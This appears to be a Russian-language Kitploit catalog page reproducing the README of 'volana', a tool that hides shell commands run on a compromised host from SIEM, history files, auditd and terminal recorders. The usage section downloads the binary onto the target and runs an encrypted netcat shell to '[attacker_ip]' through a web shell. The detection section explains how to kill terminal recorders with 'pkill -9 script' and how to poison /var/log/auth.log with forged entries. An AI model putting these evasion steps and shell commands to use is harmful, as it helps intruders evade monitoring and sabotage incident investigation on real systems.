Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
volana — 🌒 Обфускация команд оболочки для обхода систем обнаружения | Kitploit
Инструменты/GitHubGitHub/ariary/volana
ЭксплуатацияОбход IDS/IPSШелл-кодТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubariary/volana

volana

🌒 Обфускация команд оболочки для обхода систем обнаружения

Репозиторий
120973 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

volana (луна на малагасийском)

root@kitploit:~
{ Использовать ; 🌚(спрятать от); 🌞(обнаружено) } 

Обфускация команд оболочки для обхода SIEM/систем обнаружения

Во время пентеста важным аспектом является . По этой причине следует . Тем не менее, многие инфраструктуры логируют команды и отправляют их в SIEM в реальном времени, что делает последующую чистку по отдельности бесполезной. предоставляет простой способ скрыть команды, выполняемые на скомпрометированной машине, предоставляя собственную среду выполнения оболочки (введите команду, volana выполнит её за вас). Таким образом, вы

скрытность
заметать следы после своего прохода


volana
заметаете следы ВО ВРЕМЯ своего прохода

Использование

Вам нужно получить интерактивную оболочку. (Найдите способ её запустить, вы хакер, это ваша работа! иначе). Затем загрузите её на целевую машину и запустите. Всё, теперь вы можете вводить команду, которую хотите выполнить скрытно.

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Команды консоли volana:

  • ring: включить режим ring, т.е. каждая команда запускается вместе с множеством других для заметания следов (от решений, которые мониторят системные вызовы)
  • exit: выход из консоли volana

из неинтерактивной оболочки

Представьте, что у вас неинтерактивная оболочка (веб-шелл или слепая RCE), вы можете использовать подкоманды encrypt и decrypt. Предварительно необходимо собрать volana со встроенным ключом шифрования.

На машине атакующего

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Скопируйте зашифрованную команду и выполните её с помощью вашей RCE на целевой машине

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Почему бы просто не спрятать команду с помощью echo [command] | base64 ? И декодировать на цели с помощью echo [encoded_command] | base64 -d | bash

Потому что мы хотим быть защищёнными от систем, которые срабатывают на использование base64 или ищут текст base64 в команде. Также мы хотим затруднить расследование, а base64 не является настоящим препятствием.

Обнаружение

Помните, что volana — это не чудо, которое сделает вас полностью невидимым. Его цель — усложнить обнаружение вторжений и расследование.

Под "обнаружено" мы подразумеваем возможность вызвать срабатывание сигнала тревоги при выполнении определённой команды.

Спрятать от

Будет зафиксирована только строка запуска volana. 🧠 Однако, если перед её выполнением добавить пробел, то поведение bash по умолчанию не сохраняет её.

  • Системы обнаружения, основанные на выводе команды history
  • Системы обнаружения, основанные на файлах истории
    • .bash_history, ".zsh_history" и т.д.
  • Системы обнаружения, основанные на bash debug traps
  • Системы обнаружения, основанные на встроенной системе логирования sudo
  • Системы обнаружения, отслеживающие все процессы системных вызовов на уровне ОС (например, opensnoop)
  • Рекордеры терминала (tty) (script, screen -L, sexonthebash, ovh-ttyrec и т.д.)
    • Легко обнаружить и избежать: pkill -9 script
    • Не распространённый случай
    • screen немного сложнее избежать, однако он не регистрирует ввод (секретный ввод: stty -echo => избежать)
    • Обнаружение команд можно избежать с помощью volana с шифрованием

Видно для

  • Системы обнаружения, которые срабатывают на неизвестную команду (команду volana)
  • Системы обнаружения, основанные на кейлоггере
    • Легко избежать: копировать/вставлять команды
    • Не распространённый случай
  • Системы обнаружения, основанные на файлах syslog (например, /var/log/auth.log)
    • Только для команд sudo или su
    • Файл syslog можно изменить и, таким образом, отравить по своему желанию (например, для /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Системы обнаружения, основанные на системных вызовах (например, auditd, LKML/eBPF)
    • Сложно анализировать, можно сделать нечитаемым, выполнив несколько отвлекающих системных вызовов
  • Кастомная инъекция LD_PRELOAD для ведения логов
    • Вообще не распространённый случай

Баг-баунти

Извините за кликбейтный заголовок, но никаких денег контрибьюторам не предусмотрено. 🐛

Сообщите, если вы нашли:

  • способ обнаружить volana
  • способ слежки за консолью, который не обнаруживает команды volana
  • способ обойти систему обнаружения

Сообщить здесь

Благодарности

  • 8 способов слежки за консолью
  • moonwalk: похожий инструмент, который очищает следы ПОСЛЕ прохода
Скачать инструмент